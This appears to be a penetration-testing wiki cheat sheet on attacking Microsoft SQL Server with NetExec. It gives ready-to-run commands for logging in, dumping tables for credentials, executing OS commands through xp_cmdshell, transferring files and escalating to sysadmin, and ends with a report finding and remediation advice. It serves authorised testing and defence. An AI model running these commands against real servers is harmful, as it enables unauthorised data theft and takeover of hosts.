π‘οΈ Methodology Checklist
- Confirm the service is up with any known-valid login
- Pick the right auth mode: AD (
-d [DOMAIN]), local Windows (-d .), or SQL-native (--local-auth) - List databases β enumerate tables β dump interesting rows (
-q) - Check for DBA/sysadmin (
Pwn3d!) - If
Pwn3d!: OS command exec (-x) and file transfer (--put-file/--get-file) - If not sysadmin: enumerate/abuse privesc with
-M mssql_priv - Roll back any privilege change after testing
π― Operational Context
Use when: TCP/1433 is open or you have MSSQL credentials. MSSQL is high-value β application databases hide credentials, flags, and business data, and a DBA/sysadmin login often yields OS command execution via xp_cmdshell.
Think Dumber First: nxc mssql [TARGET_IP] -u [USER] -p [PASS] -d [DOMAIN] β if it prints (Pwn3d!), the login is sysadmin-class; pivot hard (commands, files, privesc). If not, you can still read data with -q.
Skip when: No 1433 and no MSSQL creds β this is protocol-specific.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -d [DOMAIN] | Auth with an AD account |
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -d . | Auth with a local Windows account |
nxc mssql [TARGET_IP] -u [USER] -p [PASS] --local-auth | Auth with a SQL-native login |
nxc mssql β¦ -q "SELECT name FROM master.dbo.sysdatabases" | List all databases |
nxc mssql β¦ -q "SELECT TABLE_SCHEMA, TABLE_NAME FROM [DB].INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'" | List tables in a database |
nxc mssql β¦ -q "SELECT * FROM [DB].[SCHEMA].[TABLE]" | Dump a table |
nxc mssql β¦ -x "whoami" | Execute an OS command (DBA/sysadmin) |
nxc mssql β¦ --put-file [LOCAL] [REMOTE] | Upload a file |
nxc mssql β¦ --get-file [REMOTE] [LOCAL] | Download a file |
nxc mssql β¦ -M mssql_priv | Enumerate MSSQL privesc paths |
nxc mssql β¦ -M mssql_priv -o ACTION=privesc | Escalate to sysadmin |
nxc mssql β¦ -M mssql_priv -o ACTION=rollback | Revert a privesc grant |
π¬ Deep Dive & Workflow
1. Pick the right auth mode
This is the #1 cause of βvalid credsβ failing against MSSQL:
-d [DOMAIN]β AD account (e.g.[DOMAIN]\[USER])-d .β local Windows account (non-DC hosts)--local-authβ SQL-native login (created inside SQL Server, e.g.sa)
# Readiness / DBA check (in labs, MSSQL may need 2β3 min after target boot)
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' -d [DOMAIN]Look for a successful auth and whether (Pwn3d!) appears (= sysadmin-class).
2. Enumerate and loot data with -q
-q runs a SQL query; -x runs a Windows command.
# List databases
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -q "SELECT name FROM master.dbo.sysdatabases"
# List tables in a database
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] \
-q "SELECT TABLE_SCHEMA, TABLE_NAME FROM [DB].INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'"
# Dump rows from an interesting table (creds, flags, tokens)
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -q "SELECT * FROM [DB].[dbo].[TABLE]"If a column shows as b'...' (bytes-style rendering), cast it:
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] \
-q "SELECT CONVERT(VARCHAR(MAX), [COLUMN]) FROM [DB].[dbo].[TABLE]"3. Command execution + file transfer (DBA/sysadmin)
# OS command via MSSQL (note: this is the SQL service context, NOT automatically host admin)
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -x "whoami"
# Upload / download
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] --put-file [LOCAL_FILE] [REMOTE_PATH]
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] --get-file [REMOTE_PATH] [LOCAL_FILE]4. Privilege escalation with mssql_priv
# See the module's actions (enum_priv default, privesc, rollback)
nxc mssql -M mssql_priv --options
# Enumerate paths: EXECUTE AS LOGIN, db_owner β sysadmin, impersonation
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -M mssql_priv
# Escalate to sysadmin
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -M mssql_priv -o ACTION=privesc
# Validate, then roll back when done (cleaner for the report)
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -x "whoami"
nxc mssql [TARGET_IP] -u [USER] -p '[PASS]' [AUTH_FLAGS] -M mssql_priv -o ACTION=rollbackπ οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Valid creds rejected | Wrong auth mode | Try -d [DOMAIN] (AD), -d . (local Windows), or --local-auth (SQL login) |
| Auth fails right after target boot | MSSQL not finished starting | Wait 2β3 min, retry with a known-valid login first |
--local-auth βdoesnβt workβ | Misread as Windows-local | --local-auth = SQL-native login, not a Windows SAM account |
| Password with special chars fails | Shell parsing | Always single-quote the password: -p '[PASS]' |
Column shows b'...' | Bytes-style tool rendering | CONVERT(VARCHAR(MAX), [COLUMN]) |
| Command exec works but no host admin | SQL service context | Exec via MSSQL β local admin on Windows; treat as a service-account foothold |
mssql_priv inconsistent | Tested many users at once | Test one user at a time |
π Reporting Trigger
Finding Title: MSSQL Exposure Enables Data Disclosure and Privilege Escalation
Impact: A reachable MSSQL instance with weak or reused credentials allowed enumeration and disclosure of application database contents (credentials, business data), and β where the login held DBA/sysadmin rights β OS command execution and escalation to sysadmin via impersonation paths.
Root Cause: Over-privileged SQL logins, reused service-account passwords, and xp_cmdshell/impersonation left enabled. MSSQL reachable from non-trusted segments.
Recommendation: Enforce least privilege on SQL logins; remove unnecessary sysadmin/impersonation grants; disable xp_cmdshell; rotate and uniquify service-account passwords; restrict 1433 to required hosts.
π Related Nodes
- MSSQL_Port_1433 β MSSQL enumeration fundamentals
- Attacking_SQL_Databases β broader SQL attack techniques
- NetExec_PostExploitation β secret dumping and post-ex with nxc
- NetExec_Database_Modules β the nxc module system and database